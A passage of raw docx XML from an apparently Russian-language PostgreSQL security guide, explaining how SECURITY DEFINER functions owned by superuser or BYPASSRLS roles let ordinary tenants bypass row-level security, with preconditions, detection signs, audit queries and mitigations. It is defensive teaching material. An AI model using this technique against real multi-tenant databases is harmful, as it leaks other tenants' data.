    <w:p w14:paraId="1EE04795" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26D00F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75089A60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617474A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY INVOKER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (default) — функция исполняется под current_user, RLS применяется normally. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>самый безопасный default</w:t>
      </w:r>
      <w:r>
        <w:t>. SECURITY DEFINER нужен только когда функция legitimately должна elevate privileges (audit-trail wrappers, controlled DDL operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2616C9CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Edge case — SECURITY INVOKER + bypassrls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348E191" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL имеет атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE bypass_role BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Если SD-функция OWNED by role с BYPASSRLS, она ведёт себя как superuser в context RLS. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дополнительный source RLS bypass</w:t>
      </w:r>
      <w:r>
        <w:t>, ortogonal к SECURITY DEFINER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E024993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Audit query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD5456" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- SD-функции, owner которых имеет BYPASSRLS или superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829291A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT n.nspname, p.proname, r.rolname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1ABDB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       r.rolsuper, r.rolbypassrls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBCA5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABEA821" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON n.oid = p.pronamespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44ADC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAFF63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB441E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND (r.rolsuper = true OR r.rolbypassrls = true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FD7BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cross-tenant data exfiltration — atomistic per-call (1 function call leaks aggregate over all tenants) или per-row (direct row access bypass tenant policy). Severity критична для multi-tenant — direct compliance violation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76142B53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEFBCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>: SECURITY DEFINER функции, читающие RLS-protected tables, вызванные от non-DBA tenant roles в large volume — поведенческий сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EA9A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> audit: SD-функции, owner которых superuser ИЛИ BYPASSRLS, читающие RLS-tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE94AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Application audit: aggregate stats возвращают «too much» — больше rows/sums чем должно быть для tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA8F1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Three independent design decisions PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50EBFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> переключает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на owner функции — documented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D79C8B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS bypass для owner таблицы / superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — by default (без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t>). Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Row Security Policies</w:t>
      </w:r>
      <w:r>
        <w:t>): *"Superusers and roles with the BYPASSRLS attribute always bypass the row security system when accessing a table. Table owners normally bypass row security as well, though a table owner can choose to be subject to row security with ALTER TABLE ... FORCE ROW LEVEL SECURITY."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414CCDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SD-функция исполняется под owner-context для всех internal queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — соответственно RLS bypass propagates через function body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04650D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание: SD-функция от superuser-owner — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatic RLS-bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для всех таблиц, owned by её owner (или any superuser). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>намеренное поведение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, чтобы делать audit-trail/admin-style functions работающими. Bug — когда разработчик создаёт такую функцию и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GRANT EXECUTE даёт обычным tenants</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5559F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Защита (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + explicit filter + SECURITY INVOKER default) — основная mitigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit всех SD-функций в production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обязательная часть security review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2B3EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474CFB4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (RLS существует с PG 9.5, 2016; SECURITY DEFINER с очень ранних).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F511348" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE на SD-функцию (часто дан PUBLIC или application-role).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DA35A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия owner функции:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> superuser, table owner, или BYPASSRLS role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67506047" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SD-функция OR table without FORCE ROW LEVEL SECURITY OR no explicit filter inside function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A608F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER функции legitimately используются для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6FC7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit logging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: функция пишет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> независимо от caller's permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1530CCCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Controlled DDL</w:t>
      </w:r>
      <w:r>
        <w:t>: tenant management functions для creating per-tenant schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DD7AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permission delegation</w:t>
      </w:r>
      <w:r>
        <w:t>: function-based access control instead of GRANT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B7BD58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-tenant admin operations</w:t>
      </w:r>
      <w:r>
        <w:t>: explicitly designed для admin-roles only (с GRANT EXECUTE ограниченным admin_role).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7CD56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Корректные SD-функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD1317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (защита 3.13.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9231B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Имеют explicit privilege checks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF current_user = 'admin_role'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или подобное).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689596D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   НЕ дают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT EXECUTE TO PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без careful review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E386352" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   На critical tables — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для extra defence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44470785" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F86523" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (regular task):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CD82B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT n.nspname, p.proname, r.rolname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DA530" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         p.prosrc LIKE '%FROM app.orders%' as accesses_rls_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C870BCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC06D9"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2AFF6ABB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE4EBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F9B73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
